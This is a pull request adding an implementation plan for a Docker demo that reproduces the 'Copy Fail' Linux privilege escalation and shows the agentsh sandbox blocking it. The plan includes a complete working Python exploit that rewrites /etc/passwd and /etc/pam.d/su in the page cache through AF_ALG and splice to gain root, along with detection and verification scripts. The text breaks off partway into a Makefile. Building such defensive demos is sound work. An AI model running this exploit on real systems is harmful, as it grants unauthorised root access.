### PR TITLE
demo: CVE-2026-31431 (Copy Fail) — page-cache LPE before/after agentsh

### DIFF
--- a/docs/superpowers/plans/2026-05-11-cve-2026-31431-copyfail-demo.md
+++ b/docs/superpowers/plans/2026-05-11-cve-2026-31431-copyfail-demo.md
@@ -1,0 +1,1396 @@
+# CVE-2026-31431 (Copy Fail) Demo Implementation Plan
+
+> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking.
+
+**Goal:** Build a self-contained Docker demo reproducing CVE-2026-31431 (Copy Fail — 4-byte page-cache write → root via /etc/passwd + PAM patch) and showing agentsh's zero-config default protection blocking it.
+
+**Architecture:** Single Dockerfile, two run modes (`vuln`/`agentsh`). Vuln mode runs the public Python PoC which patches `/etc/passwd` and `/etc/pam.d/su` in page cache and writes a root-owned marker file. Protected mode wraps the same script under agentsh — `socket(AF_ALG, ...)` returns EAFNOSUPPORT before any write fires, because `AF_ALG` is in `DefaultBlockedFamilies()` with zero custom configuration.
+
+**Tech Stack:** Docker, Python 3.11 (stdlib only — os, socket, struct, errno, sys, pwd), bash, agentsh, asciinema. Linux only.
+
+**Spec:** `docs/superpowers/specs/2026-05-11-cve-2026-31431-copyfail-demo-design.md`
+
+**Pre-verified:**
+- `AF_ALG = 38` is in `DefaultBlockedFamilies()`: `internal/seccomp/families.go:69`
+- `file_monitor.enabled: false` is required to prevent issue #304 deadlock (validated in DirtyFrag demo)
+- `bin/agentsh` and `bin/agentsh-unixwrap` are current builds with socket-family blocking
+
+---
+
+## Branch
+
+```bash
+git checkout -b demo-cve-2026-31431
+```
+
+---
+
+## File structure
+
+```
+examples/demo-cve-2026-31431/
+  Dockerfile                    # Task 3
+  Makefile                      # Task 9
+  config.yml                    # Task 4
+  agent-default.yml             # Task 4
+  .gitignore                    # Task 0
+  exploit/
+    exploit.py                  # Task 2 — full LPE PoC (marker-file variant)
+    detect.py                   # Task 2 — socket-only check
+  scripts/
+    dispatch.sh                 # Task 3
+    demo-vuln.sh                # Task 6
+    demo-agentsh.sh             # Task 7
+    verify.sh                   # Task 8
+    lib/
+      io.sh                     # Task 5
+      config-walkthrough.txt    # Task 5
+  recordings/
+    vuln.cast                   # Task 12 (user records)
+    agentsh.cast                # Task 12 (user records)
+    demo.html                   # Task 13
+    README.md                   # Task 13
+  README.md                     # Task 10
+```
+
+---
+
+## Task 0: Scaffold + dependency check
+
+**Files:**
+- Create: `examples/demo-cve-2026-31431/.gitignore`
+
+- [ ] **Step 1: Create branch and directories**
+
+```bash
+git checkout -b demo-cve-2026-31431
+mkdir -p examples/demo-cve-2026-31431/{exploit,scripts/lib,recordings}
+```
+
+- [ ] **Step 2: Write .gitignore**
+
+```
+recordings/*.tmp.cast
+```
+
+- [ ] **Step 3: Verify python3 version and required packages in debian:trixie-slim**
+
+```bash
+docker run --rm debian:trixie-slim sh -c "
+  apt-get update -qq
+  apt-get install -y --no-install-recommends python3 login libpam-runtime 2>/dev/null | tail -3
+  python3 --version
+  ls -la /usr/bin/su
+  ls /etc/pam.d/su 2>/dev/null && echo 'pam.d/su EXISTS' || echo 'pam.d/su MISSING'
+  grep pam_rootok /etc/pam.d/su 2>/dev/null || echo 'pam_rootok NOT FOUND'
+"
+```
+
+Expected:
+- `python3 --version` prints `Python 3.11` or higher
+- `/usr/bin/su` exists with setuid bit (`-rwsr-xr-x`)
+- `pam.d/su EXISTS`
+- `grep pam_rootok` finds `auth sufficient pam_rootok.so` or similar
+
+**If `/etc/pam.d/su` is missing or `pam_rootok.so` not found:** add `libpam-modules` to the apt-get line in Task 3's Dockerfile, and re-run this check.
+
+**If Python 3 < 3.10:** add `python3.11` explicitly to the apt-get line (os.splice was added in 3.10).
+
+- [ ] **Step 4: Commit**
+
+```bash
+git add examples/demo-cve-2026-31431/.gitignore
+git commit -m "demo(cve-2026-31431): scaffold + .gitignore"
+```
+
+---
+
+## Task 1: Kernel vulnerability check (optional)
+
+This task determines whether the host kernel is patched. It does NOT block implementation — the demo handles both outcomes.
+
+- [ ] **Step 1: Quick check**
+
+```bash
+docker run --rm --security-opt seccomp=unconfined debian:trixie-slim python3 -c "
+import socket, os, struct, errno
+AF_ALG = 38
+try:
+    fd = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
+    fd.close()
+    print('AF_ALG: OPEN — host kernel allows socket creation')
+    print('Exploit MAY land on this kernel (check separately).')
+except OSError as e:
+    print(f'AF_ALG: {e}')
+"
+```
+
+Expected if host kernel is unpatched: `AF_ALG: OPEN`
+Expected if host kernel is patched: depends on whether the socket creation itself is blocked or just the write path.
+
+Note: even if the kernel is patched (write doesn't land), the demo's protected-mode narrative (`EAFNOSUPPORT` from agentsh) is unaffected. Only the vuln-mode verdict changes.
+
+- [ ] **Step 2: No commit needed — this is information gathering only**
+
+---
+
+## Task 2: Exploit files
+
+**Files:**
+- Create: `examples/demo-cve-2026-31431/exploit/detect.py`
+- Create: `examples/demo-cve-2026-31431/exploit/exploit.py`
+
+### detect.py
+
+- [ ] **Step 1: Write detect.py**
+
+```python
+#!/usr/bin/env python3
+# exploit/detect.py — check whether the AF_ALG attack surface is accessible.
+# Returns 0 if OPEN (vulnerable), 1 if BLOCKED.
+import errno, socket, sys
+
+AF_ALG = 38
+
+try:
+    fd = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
+    fd.close()
+    print("socket(AF_ALG, SOCK_SEQPACKET, 0)   OPEN   — Copy Fail attack surface accessible")
+    sys.exit(0)
+except OSError as e:
+    if e.errno == errno.EAFNOSUPPORT:
+        print("socket(AF_ALG, SOCK_SEQPACKET, 0)   BLOCKED (EAFNOSUPPORT)")
+    else:
+        print(f"socket(AF_ALG, SOCK_SEQPACKET, 0)   ERROR  ({e})")
+    sys.exit(1)
+```
+
+### exploit.py
+
+- [ ] **Step 2: Write exploit.py**
+
+Based on `mfloresdacunha/CVE-2026-31431/exploit.py` with two demo modifications:
+1. Final `os.execvp("su", ["su", user])` → `os.system(f"su {user} -c 'id > /tmp/OWNED-BY-ALICE'")` — writes marker file instead of hanging on interactive TTY.
+2. `RuntimeError` catch exits with code 2 (kernel patched) vs 1 (other error) — allows `verify.sh` to distinguish.
+
+```python
+#!/usr/bin/env python3
+# exploit/exploit.py
+# CVE-2026-31431 ("Copy Fail") — LPE via algif_aead/authencesn page-cache write.
+# Two patches applied to page cache (NOT disk):
+#   1. /etc/passwd   — flip alice's UID field to "0000"
+#   2. /etc/pam.d/su — replace pam_rootok.so with pam_permit.so
+# Drop page cache (echo 3 > /proc/sys/vm/drop_caches) to revert.
+# AUTHORIZED TESTING ONLY.
+
+import errno, os, pwd, socket, struct, sys
+
+AF_ALG   = 38
+SOL_ALG  = 279
+ALG_NAME = "authencesn(hmac(sha256),cbc(aes))"
+PASSWD   = "/etc/passwd"
+PAM_SU   = "/etc/pam.d/su"
+
+
+def authenc_keyblob(authkey: bytes, enckey: bytes) -> bytes:
+    rtattr   = struct.pack("HH", 8, 1)
+    keyparam = struct.pack(">I", len(enckey))
+    return rtattr + keyparam + authkey + enckey
+
+
+def write4(target_path: str, file_offset: int, four_bytes: bytes) -> None:
+    if len(four_bytes) != 4:
+        raise ValueError("write4 requires exactly 4 bytes")
+
+    fd = os.open(target_path, os.O_RDONLY)
+    try:
+        os.read(fd, 4096)  # populate page cache
+
+        master = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
+        master.bind(("aead", ALG_NAME))
+        master.setsockopt(SOL_ALG, 1,
+                          authenc_keyblob(b"\x00" * 32, b"\x00" * 16))
+        op, _ = master.accept()
+        try:
+            aad  = b"\x00" * 4 + four_bytes
+            cmsg = [
+                (SOL_ALG, 3, struct.pack("I", 0)),
+                (SOL_ALG, 2, struct.pack("I", 16) + b"\x00" * 16),
+                (SOL_ALG, 4, struct.pack("I", 8)),
+            ]
+            op.sendmsg([aad], cmsg, socket.MSG_MORE)
+
+            pr, pw = os.pipe()
+            try:
+                n = os.splice(fd, pw, 32, offset_src=file_offset)
+                if n != 32:
+                    raise RuntimeError(f"splice file->pipe short: {n}")
+                n = os.splice(pr, op.fileno(), n)
+                if n != 32:
+                    raise RuntimeError(f"splice pipe->op short: {n}")
+            finally:
+                os.close(pr)
+                os.close(pw)
+            try:
+                op.recv(8 + 32)
+            except OSError:
+                pass
+        finally:
+            op.close()
+            master.close()
+    finally:
+        os.close(fd)
+
+
+def find_uid_field(path: str, username: str) -> tuple[int, str]:
+    with open(path, "rb") as f:
+        data = f.read()
+    prefix = (username + ":x:").encode()
+    pos = data.find(prefix)
+    if pos < 0:
+        raise LookupError(f"{username} not found in {path}")
+    uid_start = pos + len(prefix)
+    uid_end   = data.index(b":", uid_start)
+    return uid_start, data[uid_start:uid_end].decode()
+
+
+def patch_passwd(user: str) -> None:
+    uid_off, uid_str = find_uid_field(PASSWD, user)
+    if len(uid_str) != 4:
+        raise RuntimeError(
+            f"UID field {uid_str!r} is not 4 digits — exploit requires a 4-digit UID (e.g. 1000)"
+        )
+    print(f"[*] {PASSWD}: {user} UID field at offset {uid_off} = {uid_str!r}")
+    print(f"[*] Patching UID {uid_str} -> 0000 in page cache ...")
+    write4(PASSWD, uid_off, b"0000")
+
+    with open(PASSWD, "rb") as f:
+        f.seek(uid_off)
+        landed = f.read(4)
+    print(f"[*] Page cache now reads {landed!r} at offset {uid_off}")
+    if landed != b"0000":
+        raise RuntimeError(
+            "passwd patch did not land — kernel may be patched (commit a664bf3d603d)."
+        )
+    pwent = pwd.getpwnam(user)
+    print(f"[*] getpwnam({user!r}).pw_uid = {pwent.pw_uid}")
+    print(f"[+] /etc/passwd: {user} now appears as UID 0 in page cache")
+
+
+def patch_pam_su() -> None:
+    with open(PAM_SU, "rb") as f:
+        data = f.read()
+    off = data.find(b"pam_rootok.so")
+    if off < 0:
+        raise RuntimeError("pam_rootok.so not found in /etc/pam.d/su")
+    print(f"[*] {PAM_SU}: pam_rootok.so at offset {off}")
+    print(f"[*] Patching pam_rootok.so -> pam_permit.so in page cache ...")
+    write4(PAM_SU, off + 4, b"perm")
+    write4(PAM_SU, off + 8, b"it.s")
+
+    with open(PAM_SU, "rb") as f:
+        f.seek(off)
+        landed = f.read(13)
+    print(f"[*] Page cache now reads {landed!r}")
+    if landed != b"pam_permit.so":
+        raise RuntimeError("PAM patch did not land.")
+    print(f"[+] {PAM_SU}: auth sufficient pam_permit.so active — no password needed")
+
+
+def main() -> int:
+    user = os.environ.get("TARGET_USER") or pwd.getpwuid(os.getuid()).pw_name
+    print(f"[*] CVE-2026-31431 (Copy Fail)  user={user}  uid={os.getuid()}")
+
+    try:
+        patch_passwd(user)
+        patch_pam_su()
+    except LookupError as e:
+        print(f"[!] {e}")
+        return 1
+    except RuntimeError as e:
+        msg = str(e)
+        print(f"[!] {msg}")
+        if "kernel may be patched" in msg or "did not land" in msg:
+            print("[i] Host kernel appears to have commit a664bf3d603d applied.")
+            print("[i] AF_ALG socket still opened — agentsh blocks it regardless.")
+            return 2  # distinct exit code: kernel patched, not an exploit bug
+        return 1
+
+    print()
+    print(f"[+] Both patches landed. Running: su {user} -c 'id > /tmp/OWNED-BY-ALICE'")
+    print()
+    sys.stdout.flush()
+
+    # Write marker file as root (page cache makes alice look like uid=0, PAM skips auth).
+    rc = os.system(f"su {user} -c 'id > /tmp/OWNED-BY-ALICE'")
+    if rc == 0 and os.path.exists("/tmp/OWNED-BY-ALICE"):
+        with open("/tmp/OWNED-BY-ALICE") as f:
+            content = f.read().strip()
+        print(f"[+] /tmp/OWNED-BY-ALICE written: {content}")
+        print(f"[+] File owner: ", end="")
+        sys.stdout.flush()
+        os.system("ls -la /tmp/OWNED-BY-ALICE")
+    else:
+        print("[!] su did not write marker — su may have failed or kernel patched.")
+        return 1
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
+```
+
+- [ ] **Step 3: chmod and compile-check**
+
+```bash
+chmod +x examples/demo-cve-2026-31431/exploit/detect.py
+chmod +x examples/demo-cve-2026-31431/exploit/exploit.py
+
+# Syntax check both
+python3 -c "import ast; ast.parse(open('examples/demo-cve-2026-31431/exploit/detect.py').read()); print('detect.py: OK')"
+python3 -c "import ast; ast.parse(open('examples/demo-cve-2026-31431/exploit/exploit.py').read()); print('exploit.py: OK')"
+```
+
+Expected: both print `OK`.
+
+- [ ] **Step 4: Commit**
+
+```bash
+git add examples/demo-cve-2026-31431/exploit/
+git commit -m "demo(cve-2026-31431): exploit files — detect.py + exploit.py (marker-file variant)"
+```
+
+---
+
+## Task 3: Dockerfile + dispatch.sh
+
+**Files:**
+- Create: `examples/demo-cve-2026-31431/Dockerfile`
+- Create: `examples/demo-cve-2026-31431/scripts/dispatch.sh`
+
+- [ ] **Step 1: Verify agentsh binaries exist**
+
+```bash
+ls -la bin/agentsh bin/agentsh-unixwrap
+```
+
+Expected: both exist and are executable. If `bin/agentsh-unixwrap` is older than `bin/agentsh`, rebuild it:
+
+```bash
+CGO_ENABLED=1 go build -o bin/agentsh-unixwrap ./cmd/agentsh-unixwrap
+```
+
+- [ ] **Step 2: Write Dockerfile**
+
+```dockerfile
+# examples/demo-cve-2026-31431/Dockerfile
+FROM debian:trixie-slim
+
+# python3: os.splice requires 3.10+ (trixie ships 3.11).
+# login: provides /usr/bin/su (setuid root) and /etc/pam.d/su.
+# libpam-runtime: PAM framework + /etc/pam.d/ infrastructure.
+# bat, asciinema, curl: demo narration and health checks.
+RUN apt-get update && apt-get install -y --no-install-recommends \
+    python3 \
+    login \
+    libpam-runtime \
+    bat asciinema ca-certificates curl \
+ && rm -rf /var/lib/apt/lists/* \
+ && ln -sf /usr/bin/batcat /usr/local/bin/bat
+
+# Verify su is setuid root and pam.d/su has pam_rootok.so (required by exploit).
+RUN test -u /usr/bin/su || (echo "su is NOT setuid — abort" && exit 1)
+RUN grep -q pam_rootok /etc/pam.d/su || (echo "/etc/pam.d/su missing pam_rootok — abort" && exit 1)
+
+COPY bin/agentsh          /usr/local/bin/agentsh
+COPY bin/agentsh-unixwrap /usr/local/bin/agentsh-unixwrap
+RUN chmod 0755 /usr/local/bin/agentsh /usr/local/bin/agentsh-unixwrap
+
+RUN useradd -m -u 1000 -s /bin/bash alice
+
+RUN mkdir -p /etc/agentsh/policies /var/lib/agentsh/sessions
+COPY examples/demo-cve-2026-31431/config.yml       /etc/agentsh/config.yml
+COPY examples/demo-cve-2026-31431/agent-default.yml /etc/agentsh/policies/agent-default.yml
+RUN chown -R root:alice /etc/agentsh/policies \
+ && chmod 0775 /etc/agentsh/policies
+
+COPY examples/demo-cve-2026-31431/exploit  /opt/exploit
+COPY examples/demo-cve-2026-31431/scripts  /opt/scripts
+RUN chmod +x /opt/exploit/*.py /opt/scripts/*.sh /opt/scripts/lib/*.sh 2>/dev/null || true
+
+RUN install -d -o alice -g alice /home/alice/work \
+ && chown -R alice:alice /var/lib/agentsh
+
+USER alice
+WORKDIR /home/alice/work
+ENV PS1='alice@demo:\w$ ' TERM=xterm-256color TARGET_USER=alice
+
+ENTRYPOINT ["/opt/scripts/dispatch.sh"]
+CMD ["help"]
+```
+
+- [ ] **Step 3: Write dispatch.sh**
+
+```bash
+#!/bin/bash
+# scripts/dispatch.sh
+set -eu
+
+start_server() {
+    agentsh server --config /etc/agentsh/config.yml >/tmp/agentsh-server.log 2>&1 &
+    local pid=$!
+    for _ in $(seq 1 50); do
+        if curl -fsS http://127.0.0.1:18080/health >/dev/null 2>&1; then
+            return 0
+        fi
+        if ! kill -0 "$pid" 2>/dev/null; then
+            echo "agentsh server exited prematurely. Log:" >&2
+            cat /tmp/agentsh-server.log >&2
+            return 1
+        fi
+        sleep 0.2
+    done
+    echo "agentsh server did not become ready within 10s. Log:" >&2
+    cat /tmp/agentsh-server.log >&2
+    return 1
+}
+
+case "${1:-help}" in
+  vuln)    exec /opt/scripts/demo-vuln.sh ;;
+  agentsh) start_server && exec /opt/scripts/demo-agentsh.sh ;;
+  verify)  start_server && exec /opt/scripts/verify.sh "${2:-both}" ;;
+  shell)   exec bash -l ;;
+  help|*)
+    cat <<EOF
+Usage: docker run [flags] agentsh-copyfail-demo <mode>
+
+Modes:
+  vuln     Reproduce CVE-2026-31431; root marker written.
+  agentsh  Same exploit under agentsh; blocked before first write.
+  verify   Non-interactive assertion run.
+  shell    Interactive shell as alice.
+
+Docker flags for vuln mode:
+  --security-opt seccomp=unconfined
+
+Docker flags for agentsh mode:
+  --cap-add=SYS_ADMIN --cap-add=SYS_PTRACE
+  --device=/dev/fuse --security-opt=apparmor=unconfined
+EOF
+    exit 1 ;;
+esac
+```
+
+- [ ] **Step 4: Verify image builds (will fail on missing config — expected)**
+
+```bash
+chmod +x examples/demo-cve-2026-31431/scripts/dispatch.sh
+docker build -f examples/demo-cve-2026-31431/Dockerfile -t agentsh-copyfail-demo . 2>&1 | tail -8
+```
+
+Expected: build fails on `COPY examples/demo-cve-2026-31431/config.yml` — Task 4 provides it.
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add examples/demo-cve-2026-31431/Dockerfile \
+        examples/demo-cve-2026-31431/scripts/dispatch.sh
+git commit -m "demo(cve-2026-31431): Dockerfile + dispatcher"
+```
+
+---
+
+## Task 4: config.yml + agent-default.yml
+
+**Files:**
+- Create: `examples/demo-cve-2026-31431/config.yml`
+- Create: `examples/demo-cve-2026-31431/agent-default.yml`
+
+- [ ] **Step 1: Write config.yml**
+
+```yaml
+# examples/demo-cve-2026-31431/config.yml
+# AF_ALG (family 38) is in DefaultBlockedFamilies() — no custom rule needed.
+# agentsh blocked Copy Fail before the CVE was disclosed.
+
+server:
+  http:
+    addr: "127.0.0.1:18080"
+  grpc:
+    enabled: false
+  unix_socket:
+    enabled: false
+
+auth:
+  type: "none"
+
+metrics:
+  enabled: false
+
+health:
+  path: "/health"
+  readiness_path: "/ready"
+
+policies:
+  dir: /etc/agentsh/policies
+  default: agent-default
+
+sessions:
+  base_dir: /var/lib/agentsh/sessions
+  max_sessions: 10
+
+audit:
+  enabled: true
+  output: /var/lib/agentsh/audit.jsonl
+  storage:
+    sqlite_path: /var/lib/agentsh/events.db
+
+sandbox:
+  allow_degraded: true
+  fuse:
+    enabled: false
+  network:
+    enabled: false
+  unix_sockets:
+    enabled: false
+  seccomp:
+    enabled: true
+    mode: enforce
+    syscalls:
+      default_action: allow
+    file_monitor:
+      enabled: false  # explicit: prevents auto-enable deadlock (issue #304)
+    # blocked_socket_families is NOT set here.
+    # DefaultBlockedFamilies() applies automatically and includes AF_ALG.
+    # No custom rules required to block CVE-2026-31431.
+```
+
+- [ ] **Step 2: Write agent-default.yml**
+
+```yaml
+version: 1
+name: agent-default
+description: Minimal default policy for the Copy Fail demo.
+```
+
+- [ ] **Step 3: Rebuild image — should now succeed**
+
+```bash
+docker build -f examples/demo-cve-2026-31431/Dockerfile -t agentsh-copyfail-demo . 2>&1 | tail -5
+```
+
+Expected: build succeeds. If the `grep pam_rootok` check fails, add `libpam-modules` to the apt-get line.
+
+- [ ] **Step 4: Quick sanity check**
+
+```bash
+docker run --rm -u 0 --entrypoint /bin/bash agentsh-copyfail-demo -c \
+  "ls -la /usr/bin/su && grep pam_rootok /etc/pam.d/su && python3 --version"
+```
+
+Expected: setuid su, pam_rootok line present, Python 3.11+.
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add examples/demo-cve-2026-31431/config.yml \
+        examples/demo-cve-2026-31431/agent-default.yml
+git commit -m "demo(cve-2026-31431): agentsh config — zero custom rules, AF_ALG in DefaultBlockedFamilies()"
+```
+
+---
+
+## Task 5: Narration helpers
+
+**Files:**
+- Create: `examples/demo-cve-2026-31431/scripts/lib/io.sh`
+- Create: `examples/demo-cve-2026-31431/scripts/lib/config-walkthrough.txt`
+
+- [ ] **Step 1: Write io.sh**
+
+```bash
+# scripts/lib/io.sh
+if [ -z "${NO_COLOR:-}" ] && [ -t 1 ]; then
+    C_HDR=$'\033[1;36m'; C_OK=$'\033[1;32m'
+    C_FAIL=$'\033[1;31m'; C_DIM=$'\033[2m'; C_OFF=$'\033[0m'
+else
+    C_HDR=''; C_OK=''; C_FAIL=''; C_DIM=''; C_OFF=''
+fi
+PAUSE_SHORT="${PAUSE_SHORT:-1}"
+PAUSE_LONG="${PAUSE_LONG:-2}"
+
+banner() {
+    printf '\n%s%s%s\n'  "$C_HDR" "============================================================" "$C_OFF"
+    printf '%s  %s%s\n'  "$C_HDR" "$*" "$C_OFF"
+    printf '%s%s%s\n\n'  "$C_HDR" "============================================================" "$C_OFF"
+}
+step()  { printf '\n%s[%s]%s %s\n' "$C_HDR" "$1" "$C_OFF" "$2"; sleep "$PAUSE_SHORT"; }
+note()  { printf '%s    %s%s\n'    "$C_DIM" "$*" "$C_OFF"; }
+pause() { sleep "${1:-$PAUSE_LONG}"; }
+verdict_success() { printf '\n%sVERDICT: EXPLOIT SUCCEEDED — %s%s\n\n' "$C_FAIL" "$*" "$C_OFF"; }
+verdict_patched() { printf '\n%sVERDICT: KERNEL PATCHED — %s%s\n\n'    "$C_FAIL" "$*" "$C_OFF"; }
+verdict_blocked() { printf '\n%sVERDICT: BLOCKED — %s%s\n\n'           "$C_OK"   "$*" "$C_OFF"; }
+
+print_walkthrough() {
+    local file="$1" block=''
+    while IFS= read -r line || [ -n "$line" ]; do
+        if [ "$line" = '--- pause ---' ]; then
+            printf '%s%s%s\n' "$C_DIM" "$block" "$C_OFF"
+            pause; block=''
+        else
+            block="${block}${line}"$'\n'
+        fi
+    done < "$file"
+    [ -n "$block" ] && printf '%s%s%s\n' "$C_DIM" "$block" "$C_OFF"
+}
+
+show_yaml() {
+    if command -v bat >/dev/null 2>&1; then
+        bat --language yaml --paging never --style plain "$1"
+    else
+        cat "$1"
+    fi
+}
+```
+
+- [ ] **Step 2: Write config-walkthrough.txt**
+
+```
+Zero configuration required.
+
+--- pause ---
+
+agentsh's DefaultBlockedFamilies() includes AF_ALG (family 38)
+alongside AF_VSOCK, AF_RDS, AF_TIPC, and other kernel facilities
+that are almost never needed by AI agent workloads.
+
+--- pause ---
+
+Copy Fail was publicly disclosed on 2026-04-29.
+AF_ALG was added to the default block list years earlier,
+as general kernel attack-surface reduction.
+Any system running agentsh with default settings was already
+protected — before the CVE existed.
+
+--- pause ---
+
+When socket(AF_ALG, SOCK_SEQPACKET, 0) returns EAFNOSUPPORT,
+the exploit stops at line 1 of write4().
+The page-cache write never fires.
+/etc/passwd and /etc/pam.d/su are never touched.
+```
+
+- [ ] **Step 3: Commit**
+
+```bash
+git add examples/demo-cve-2026-31431/scripts/lib/
+git commit -m "demo(cve-2026-31431): narration helpers (io.sh + walkthrough)"
+```
+
+---
+
+## Task 6: demo-vuln.sh
+
+**Files:**
+- Create: `examples/demo-cve-2026-31431/scripts/demo-vuln.sh`
+
+- [ ] **Step 1: Write demo-vuln.sh**
+
+```bash
+#!/bin/bash
+# scripts/demo-vuln.sh — CVE-2026-31431 reproduction without agentsh.
+set -eu
+. /opt/scripts/lib/io.sh
+
+MARKER=/tmp/OWNED-BY-ALICE
+
+banner "CVE-2026-31431 (Copy Fail) — bare exploit (no agentsh)"
+note "AF_ALG socket + splice() feeds a file's page cache into the kernel"
+note "crypto engine as a writable AEAD scatterlist. 4 bytes at a time,"
+note "we rewrite /etc/passwd (alice uid 1000→0000) and /etc/pam.d/su"
+note "(pam_rootok.so → pam_permit.so). Nothing touches disk."
+pause
+
+step "0/5" "(no agentsh — bare Linux, Docker seccomp disabled)"
+note "agentsh is installed but not wrapping this shell."
+
+step "1/5" "Identity check — alice is unprivileged"
+whoami; id
+
+step "2/5" "AF_ALG attack surface check"
+note "socket(AF_ALG, SOCK_SEQPACKET, 0):"
+python3 /opt/exploit/detect.py || true
+
+step "3/5" "/etc/passwd — pre-exploit state"
+grep "^alice:" /etc/passwd || true
+note "(uid field will change in page cache without touching disk)"
+
+step "4/5" "Run Copy Fail exploit"
+python3 /opt/exploit/exploit.py
+EXPLOIT_RC=$?
+
+step "5/5" "Check results"
+if [ $EXPLOIT_RC -eq 0 ] && [ -f "$MARKER" ]; then
+    echo "--- /etc/passwd (page cache): ---"
+    grep "^alice:" /etc/passwd || true
+    echo "--- /tmp/OWNED-BY-ALICE: ---"
+    cat "$MARKER"
+    echo "--- ownership: ---"
+    ls -la "$MARKER"
+    verdict_success "alice obtained root via page-cache corruption."
+    exit 0
+elif [ $EXPLOIT_RC -eq 2 ]; then
+    note "Kernel patched (commit a664bf3d603d). Write did not land."
+    note "AF_ALG socket still opened — agentsh would have blocked this."
+    verdict_patched "kernel patched; socket still open, agentsh still blocks it."
+    exit 0
+else
+    printf '\n%sEXPECTED EXPLOIT TO SUCCEED but exploit.py returned %d.%s\n' "$C_FAIL" "$EXPLOIT_RC" "$C_OFF"
+    exit 1
+fi
+```
+
+- [ ] **Step 2: chmod + commit**
+
+```bash
+chmod +x examples/demo-cve-2026-31431/scripts/demo-vuln.sh
+git add examples/demo-cve-2026-31431/scripts/demo-vuln.sh
+git commit -m "demo(cve-2026-31431): demo-vuln.sh"
+```
+
+---
+
+## Task 7: demo-agentsh.sh
+
+**Files:**
+- Create: `examples/demo-cve-2026-31431/scripts/demo-agentsh.sh`
+
+- [ ] **Step 1: Write demo-agentsh.sh**
+
+```bash
+#!/bin/bash
+# scripts/demo-agentsh.sh — same exploit, wrapped by agentsh defaults.
+set -eu
+. /opt/scripts/lib/io.sh
+
+MARKER=/tmp/OWNED-BY-ALICE
+CONFIG=/etc/agentsh/config.yml
+
+banner "CVE-2026-31431 (Copy Fail) — same exploit, under agentsh"
+note "AF_ALG is in DefaultBlockedFamilies(). Zero custom configuration."
+note "agentsh blocked this before the CVE was disclosed."
+pause
+
+step "0/4" "Show the agentsh config — no custom rules"
+show_yaml "$CONFIG"
+pause
+print_walkthrough /opt/scripts/lib/config-walkthrough.txt
+
+step "1/4" "Identity check (same alice, same image)"
+agentsh wrap -- whoami
+agentsh wrap -- id
+
+step "2/4" "AF_ALG attack surface check under agentsh"
+note "Expected: BLOCKED (EAFNOSUPPORT) — DefaultBlockedFamilies() catches AF_ALG"
+agentsh wrap -- python3 /opt/exploit/detect.py || true
+
+step "3/4" "Attempt the full exploit under agentsh"
+note "Expected: Traceback at socket(AF_ALG, ...) — write4() never runs"
+agentsh wrap -- python3 /opt/exploit/exploit.py || true
+
+step "4/4" "Verify nothing was modified"
+note "/etc/passwd alice uid:"
+grep "^alice:" /etc/passwd || true
+note "Marker file:"
+ls "$MARKER" 2>&1 || note "  (expected: no such file)"
+
+if [ ! -f "$MARKER" ] && ! grep -q "^alice:x:0000:" /etc/passwd 2>/dev/null; then
+    verdict_blocked "AF_ALG blocked before first write. /etc/passwd and PAM untouched."
+    exit 0
+else
+    printf '\n%sEXPECTED BLOCKED but exploit may have landed.%s\n' "$C_FAIL" "$C_OFF"
+    exit 1
+fi
+```
+
+- [ ] **Step 2: chmod + commit**
+
+```bash
+chmod +x examples/demo-cve-2026-31431/scripts/demo-agentsh.sh
+git add examples/demo-cve-2026-31431/scripts/demo-agentsh.sh
+git commit -m "demo(cve-2026-31431): demo-agentsh.sh"
+```
+
+---
+
+## Task 8: verify.sh
+
+**Files:**
+- Create: `examples/demo-cve-2026-31431/scripts/verify.sh`
+
+- [ ] **Step 1: Write verify.sh**
+
+```bash
+#!/bin/bash
+# scripts/verify.sh — assert success criteria.
+set -eu
+. /opt/scripts/lib/io.sh
+
+MARKER=/tmp/OWNED-BY-ALICE
+
+assert_af_alg_open() {
+    if python3 /opt/exploit/detect.py 2>&1 | grep -q "OPEN"; then
+        echo "PASS: AF_ALG socket OPEN in vuln mode"
+    else
+        echo "FAIL: AF_ALG socket not OPEN in vuln mode"
+        return 1
+    fi
+}
+
+assert_exploit_ran() {
+    python3 /opt/exploit/exploit.py; RC=$?
+    if [ $RC -eq 0 ] && [ -f "$MARKER" ]; then
+        echo "PASS: exploit wrote marker as root (exit 0)"
+    elif [ $RC -eq 2 ]; then
+        echo "PASS: kernel patched (exit 2) — AF_ALG still open, agentsh still blocks"
+    else
+        echo "FAIL: exploit.py returned unexpected exit code $RC"
+        return 1
+    fi
+}
+
+assert_af_alg_blocked() {
+    if agentsh wrap -- python3 /opt/exploit/detect.py 2>&1 | grep -q "BLOCKED"; then
+        echo "PASS: AF_ALG BLOCKED in agentsh mode"
+    else
+        echo "FAIL: AF_ALG not BLOCKED in agentsh mode"
+        return 1
+    fi
+}
+
+assert_exploit_blocked() {
+    agentsh wrap -- python3 /opt/exploit/exploit.py; RC=$?
+    if [ $RC -ne 0 ] && [ ! -f "$MARKER" ] && ! grep -q "^alice:x:0000:" /etc/passwd; then
+        echo "PASS: exploit blocked — marker absent, /etc/passwd unchanged"
+    else
+        echo "FAIL: exploit.py may have landed under agentsh"
+        return 1
+    fi
+}
+
+case "${1:-both}" in
+  vuln)
+      rm -f "$MARKER" 2>/dev/null || true
+      assert_af_alg_open
+      assert_exploit_ran ;;
+  agentsh)
+      rm -f "$MARKER" 2>/dev/null || true
+      assert_af_alg_blocked
+      assert_exploit_blocked ;;
+  both)
+      $0 vuln
+      $0 agentsh ;;
+  *)
+      echo "Usage: verify.sh [vuln|agentsh|both]" >&2
+      exit 2 ;;
+esac
+```
+
+- [ ] **Step 2: chmod + commit**
+
+```bash
+chmod +x examples/demo-cve-2026-31431/scripts/verify.sh
+git add examples/demo-cve-2026-31431/scripts/verify.sh
+git commit -m "demo(cve-2026-31431): verify.sh"
+```
+
+---
+
+## Task 9: Makefile
+
+**Files:**
+- Create: `examples/demo-cve-2026-31431/Makefile`
+
+- [ ] **Step 1: Write Makefile**
+
+```make
+# examples/demo-cve-2026-31431/Makefile
+IMAGE        := agentsh-copyfail-demo
